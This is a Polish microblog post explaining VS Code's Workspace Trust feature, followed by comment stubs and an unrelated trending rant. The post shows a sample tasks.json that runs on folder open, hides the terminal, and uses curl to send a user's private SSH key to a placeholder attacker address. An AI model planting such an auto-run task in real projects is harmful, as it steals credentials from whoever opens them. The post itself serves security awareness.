Wpis z mikrobloga

Skopiuj link

14.09.2023, 06:51:21

257

Visual Studio Code posiada funkcję Workspace Trust. Ale po co ona jest? #od0dopentestera
TL;DR: jeśli pobierzesz i otworzysz złośliwy projekt, a następnie wciśniesz niebieski przycisk Yes, I Trust - potencjalny atakujący może wykonać dowolny skrypt/program na Twoim komputerze.

Projekt w Visual Studio Code może posiadać specjalny plik .vscode/tasks.json. Dla przykładu:

{
    "version": "2.0.0",
    "tasks": [
      {
        "label": "Uruchom testy",
        "type": "shell",
        "group": "test",
        "command": "curl -d @/Users/kacper/.ssh/id_rsa https://tutaj_twój_adres",
        "runOptions": {
            "runOn": "folderOpen"
        },
        "presentation": {
          "reveal": "never",
          "panel": "new",
        }
      }
    ]
}

Ukradnie klucz prywatny użytkownika Kacper i wyśle go do serwera atakującego.

"runOn": "folderOpen" - Nasze zadanie zostanie uruchomione automatycznie, zaraz po otworzeniu projektu.
"reveal": "never" - Ta opcja sprawia, że użytkownikowi nie wyświetli się okno terminala.

Czy takie ataki są popularne? NIE.
Czy się zdarzają? TAK.

Więcej zobaczysz na YouTube lub na blogu.

Interesujesz się bezpieczeństwem? Sprawdź mój kurs Bezpieczny Programista.

#programowanie #programista15k #gruparatowaniapoziomu #technologia #ciekawostki #bezpieczenstwo #informatyka #komputery #nauka

KacperSzurek - Visual Studio Code posiada funkcję Workspace Trust. Ale po co ona jest...

14.09.2023, 06:51:47 via Wykop

201

Chcesz być wołany do podobnych wpisów? Zaplusuj ten komentarz.

14.09.2023, 06:51:53 via Wykop

20

Jeśli mam Cię usunąć z listy – zaplusuj ten komentarz.

14.09.2023, 07:05:37 via Wykop

0

14.09.2023, 07:05:45 via Wykop

0

14.09.2023, 07:05:51 via Wykop

0

14.09.2023, 07:05:55 via Wykop

0

14.09.2023, 07:06:02 via Wykop

0

14.09.2023, 07:06:13 via Wykop

0

14.09.2023, 07:07:19 via Wykop

0

Treść została ukryta...

14.09.2023, 07:07:31 via Wykop

0

Treść została ukryta...

14.09.2023, 07:07:38 via Wykop

0

Treść została ukryta...

14.09.2023, 07:07:44 via Wykop

0

Treść została ukryta...

14.09.2023, 07:07:51 via Wykop

1

Treść została ukryta...

14.09.2023, 07:08:35 via Wykop

0

Treść została ukryta...

14.09.2023, 07:08:43 via Wykop

0

Treść została ukryta...

14.09.2023, 07:08:49 via Wykop

0

Treść została ukryta...

14.09.2023, 07:08:55 via Wykop

0

Treść została ukryta...

14.09.2023, 07:09:01 via Wykop

0

Treść została ukryta...

14.09.2023, 07:09:06 via Wykop

0

Treść została ukryta...

14.09.2023, 07:09:12 via Wykop

0

Treść została ukryta...

Aktywne Wpisy

18+

Zawiera treści 18+

Ta treść została oznaczona jako materiał kontrowersyjny lub dla dorosłych.

KRZYSZTOF_DZONG_UN

KRZYSZTOF_DZONG_UN +85

4 godz. i 1 min temu

Wysłałem przez ostatni miesiąc około 100 CV. Efekt – 1 rozmowa o pracę, na której zostałem odpalony i nie przeszedłem rekrutacji. Reszta ofert, na które aplikowałem CISZA.

Wysłałem przez ostatni miesiąc około 1000 zaproszeń/polubien na różnych aplikacjach randkowych. Efekt – 4 pary, z czego 3 to jakieś fejk konta/scamy i jedna – 36-letnia bezrobotna bambaryła z 3 bękartów. (Nie pytajcie czemu dałem jej lajka, po prostu każdego dodawałem).

Chciałem się wyprowadzić od

KRZYSZTOFDZONGUN - Wysłałem przez ostatni miesiąc około 100 CV. Efekt – 1 rozmowa o p... — źródło: temp_file1894165543150218648
Pobierz